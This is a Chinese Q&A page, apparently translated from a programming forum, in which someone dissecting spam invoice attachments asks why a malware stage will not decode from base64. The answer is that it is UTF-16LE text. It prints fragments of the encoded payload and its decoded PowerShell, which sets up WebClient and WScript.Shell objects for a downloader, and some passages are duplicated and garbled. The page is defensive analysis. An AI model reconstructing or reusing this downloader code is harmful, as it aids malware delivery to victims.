Fatal编程技术网
  • text/
  • Text 文本编码&;垃圾邮件

Text 文本编码&;垃圾邮件

text encoding

Text 文本编码&;垃圾邮件,text,encoding,Text,Encoding,大家好。 请帮我打一场针对垃圾邮件/恶意软件的个人战争。我收到的垃圾邮件带有明显虚假的附件,形式为.doc账单或发票。 这些伪造的文档包含宏代码,我可以使用各种工具对其进行解密。通常,此类代码尝试下载加密文本文件,实际上是进一步的VBA代码,如果执行该代码,则尝试以EXE文件的形式下载真正的恶意软件。 加密的文本文件通常是一个简单的base64编码字符串。 使用普通的base64编码/解码工具足以解密内容并识别恶意软件试图从中下载exe病毒的IP地址。 最近情况发生了变化。现在,加密的文本文件包

大家好。 请帮我打一场针对垃圾邮件/恶意软件的个人战争。我收到的垃圾邮件带有明显虚假的附件,形式为.doc账单或发票。 这些伪造的文档包含宏代码,我可以使用各种工具对其进行解密。通常,此类代码尝试下载加密文本文件,实际上是进一步的VBA代码,如果执行该代码,则尝试以EXE文件的形式下载真正的恶意软件。 加密的文本文件通常是一个简单的base64编码字符串。 使用普通的base64编码/解码工具足以解密内容并识别恶意软件试图从中下载exe病毒的IP地址。 最近情况发生了变化。现在,加密的文本文件包含显然是base64编码的内容,但它不是。 内容类似于:

PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=

<^@t^@e^@x^@t^@1^@0^@>^@$^@h^@y^@g^@q^@u^@d^@g^@a^@h^@s^@=^@'^@n^@u^@d^@q^@h^@w^@i^@u^@d^@h^@q^@w^@d^@q^@w^@'^@;^@
^@
^@$^@g^@f^@y^@w^@u^@g^@h^@a^@m^@s^@=^@'^@1^@2^@j^@h^@3^@g^@1^@2^@h^@ ^@1^@2^@g^@3^@j^@h^@1^@2^@3^@1^@2^@3^@'^@;^@
^@
^@$^@d^@o^@w^@n^@ ^@=^@ ^@N^@e^@w^@-^@O^@b^@j^@e^@c^@t^@ ^@S^@y^@s^@t^@e^@m^@.^@N^@e^@t^@.^@W^@e^@b^@C^@l^@i^@e^@n^@t^@;^@
它类似于base64编码。但如果您尝试使用base64对其进行解码,则会得到如下结果:

PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=

<^@t^@e^@x^@t^@1^@0^@>^@$^@h^@y^@g^@q^@u^@d^@g^@a^@h^@s^@=^@'^@n^@u^@d^@q^@h^@w^@i^@u^@d^@h^@q^@w^@d^@q^@w^@'^@;^@
^@
^@$^@g^@f^@y^@w^@u^@g^@h^@a^@m^@s^@=^@'^@1^@2^@j^@h^@3^@g^@1^@2^@h^@ ^@1^@2^@g^@3^@j^@h^@1^@2^@3^@1^@2^@3^@'^@;^@
^@
^@$^@d^@o^@w^@n^@ ^@=^@ ^@N^@e^@w^@-^@O^@b^@j^@e^@c^@t^@ ^@S^@y^@s^@t^@e^@m^@.^@N^@e^@t^@.^@W^@e^@b^@C^@l^@i^@e^@n^@t^@;^@

^$^@h^@y^@g^@q^@u^@d^@g^@a^@h^@s^=^@n^@u^@d^@q^@h^@w^@i^@u^@d^@h^@q^@w^@d^@q^@w^@d^@q^@w^^@
^@
^@$^@g^@f^@y^@w^@u^@g^@h^@a^@m^@s^@=^@1^@2^@j^@h^@3^@g^@1^@2^@1^@2^@2^@3^@1^@2^@3^@^@
^@
^@$^@d^@o^@w^@n^@n^@=^@n^@e^@w^@b^@j^@e^@c^@t^@y^@S^@t^@e^@m^@n^@e^@t^@e^@t^@e^@t^@e^@t^@b^@c^@l^@i^@e^@n^^@
而不是纯文本(下载exe文件的VBS代码)。 有人能帮我找到破译这些污点的方法吗?
提前谢谢

这看起来像是UTF16-LE文本的有效base64编码-你的问题是什么?@Toby让我换一种说法。例如,通过发出
base64--decode encoded.txt>decoded.tx
,decoded.txt通常包含类似于Sub-WorkbookOpen()dim-uri的内容,如字符串uri='thespammeruri.com'。。。在这种情况下,我得到的是一些不可读的东西。我的问题是:它真的是base64还是有什么不同?你在说你认为这是base64,明白了!在文本编辑器中,我简单地删除了所有的^@char,我得到了病毒的纯文本。谢谢你,托比。这看起来像是UTF16-LE文本的有效base64编码-你的问题是什么?@Toby,让我换一种说法。例如,通过发出
base64--decode encoded.txt>decoded.tx
,decoded.txt通常包含类似于Sub-WorkbookOpen()dim-uri的内容,如字符串uri='thespammeruri.com'。。。在这种情况下,我得到的是一些不可读的东西。我的问题是:它真的是base64还是有什么不同?你在说你认为这是base64,明白了!在文本编辑器中,我简单地删除了所有的^@char,我得到了病毒的纯文本。谢谢你,托比。